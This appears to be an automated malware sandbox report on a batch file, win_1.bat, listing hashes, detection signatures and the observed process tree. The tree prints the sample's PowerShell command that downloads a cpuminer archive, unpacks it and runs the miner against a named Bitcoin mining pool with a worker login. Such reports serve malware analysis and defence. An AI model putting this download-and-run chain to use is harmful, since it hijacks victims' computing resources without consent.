Overview
overview
10Static
static
1win.bat
windows10-1703-x64
10win_1.bat
windows10-1703-x64
10win_10.bat
windows10-1703-x64
10win_11.bat
windows10-1703-x64
10win_12.bat
windows10-1703-x64
10win_13.bat
windows10-1703-x64
10win_14.bat
windows10-1703-x64
10win_15.bat
windows10-1703-x64
10win_2.bat
windows10-1703-x64
10win_3.bat
windows10-1703-x64
10win_4.bat
windows10-1703-x64
10win_5.bat
windows10-1703-x64
10win_6.bat
windows10-1703-x64
10win_7.bat
windows10-1703-x64
10win_8.bat
windows10-1703-x64
10win_9.bat
windows10-1703-x64
10Analysis
-
max time kernel
1799s -
max time network
1801s -
platform
windows10-1703_x64 -
resource
win10-20230621-en -
resource tags
arch:x64arch:x86image:win10-20230621-enlocale:en-usos:windows10-1703-x64system -
submitted
30/06/2023, 15:14
Static task
static1
Behavioral task
behavioral1
Sample
win.bat
Resource
win10-20230621-en
Behavioral task
behavioral2
Sample
win_1.bat
Resource
win10-20230621-en
Behavioral task
behavioral3
Sample
win_10.bat
Resource
win10-20230621-en
Behavioral task
behavioral4
Sample
win_11.bat
Resource
win10-20230621-en
Behavioral task
behavioral5
Sample
win_12.bat
Resource
win10-20230621-en
Behavioral task
behavioral6
Sample
win_13.bat
Resource
win10-20230621-en
Behavioral task
behavioral7
Sample
win_14.bat
Resource
win10-20230621-en
Behavioral task
behavioral8
Sample
win_15.bat
Resource
win10-20230621-en
Behavioral task
behavioral9
Sample
win_2.bat
Resource
win10-20230621-en
Behavioral task
behavioral10
Sample
win_3.bat
Resource
win10-20230621-en
Behavioral task
behavioral11
Sample
win_4.bat
Resource
win10-20230621-en
Behavioral task
behavioral12
Sample
win_5.bat
Resource
win10-20230621-en
Behavioral task
behavioral13
Sample
win_6.bat
Resource
win10-20230621-en
Behavioral task
behavioral14
Sample
win_7.bat
Resource
win10-20230621-en
Behavioral task
behavioral15
Sample
win_8.bat
Resource
win10-20230621-en
Behavioral task
behavioral16
Sample
win_9.bat
Resource
win10-20230621-en
General
-
Target
win_1.bat
-
Size
679B
-
MD5
18842e3757e17e2733c7460f7a56d4fd
-
SHA1
620080cdd5c84a38aac23210a35558ec8f2086e2
-
SHA256
66cd9049152d3e9507ca112e1a0609ff8a2ecd53fc306128a0129da7d73b0d83
-
SHA512
08e221ae077c6bbd39272ecb106d0744ef28d15c2d1cc79ff0bb201eeedd20af3e132240fcc29b797b83073a0a16beb5ca6a24d7f181385e0337466cc976a4b0
Malware Config
Extracted
https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 2164 powershell.exe 4 2164 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4464 cpuminer-sse2.exe -
resource yara_rule behavioral2/files/0x000600000001af16-282.dat upx behavioral2/files/0x000600000001af16-281.dat upx behavioral2/memory/4464-283-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-284-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-286-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-288-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-289-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-291-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-294-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-295-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-296-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-301-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-303-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-307-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-310-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-313-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-316-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-319-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-322-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-324-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-325-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-327-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-329-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-332-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-335-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-338-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-341-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-342-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-344-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx behavioral2/memory/4464-347-0x00007FF7C87C0000-0x00007FF7C8E3D000-memory.dmp upx -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2164 powershell.exe 2164 powershell.exe 2164 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeLockMemoryPrivilege 4464 cpuminer-sse2.exe Token: SeLockMemoryPrivilege 4464 cpuminer-sse2.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1832 wrote to memory of 2164 1832 cmd.exe 67 PID 1832 wrote to memory of 2164 1832 cmd.exe 67 PID 1832 wrote to memory of 3928 1832 cmd.exe 68 PID 1832 wrote to memory of 3928 1832 cmd.exe 68 PID 1832 wrote to memory of 4464 1832 cmd.exe 69 PID 1832 wrote to memory of 4464 1832 cmd.exe 69
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\win_1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip', 'cpuminer-opt-win.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Force -Path cpuminer-opt-win.zip -DestinationPath cpuminer-opt"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe.\cpuminer-sse2.exe -a SHA256d -o stratum+tcp://btc.f2pool.com:1314 -u kris21.001 -p 212353658769868002⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
Filesize
1KB
MD5815463b0a2d786e51d93683448ae4a99
SHA19371b39f251a50c00c28351ed9322bf0af83add1
SHA2560d0337049e3d80d79a65c9c6c045fc4e90569964cd270f40968e918bb4d1053b
SHA5123ecf1b04063a2f71ce3825603f41c8fcdbf052008a70a6e7a2fdcfc79696189e6596c57790f76097bf6dd524981b724613c8f287e68b849a98e321a86b73cbc7
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
20.9MB
MD599cc95c9ce13cf3da743e1d56dabe92d
SHA1e819db3b6ad4703fbc8535dadad3ad29d3cc2039
SHA256df84febc2319e8e5cca7e6d0c9341d4a6824fb28646c1e435b7da58e9f9ec59b
SHA512932523c4ab20c83343395498be61497dbc9ad90b3b35d3551817b94dd530b083b07d3a4b37b04c4f3d97ed1e8bb036d9d18b079a86ce46816b3a31d9eba35c02
-
Filesize
2.6MB
MD5d136eb0fdd0e7826893f332c7fc3f7a2
SHA11e7fd635278e954eb0ee8cb951d16e4ecf60592f
SHA256993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26
SHA512895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757
-
Filesize
2.6MB
MD5d136eb0fdd0e7826893f332c7fc3f7a2
SHA11e7fd635278e954eb0ee8cb951d16e4ecf60592f
SHA256993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26
SHA512895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757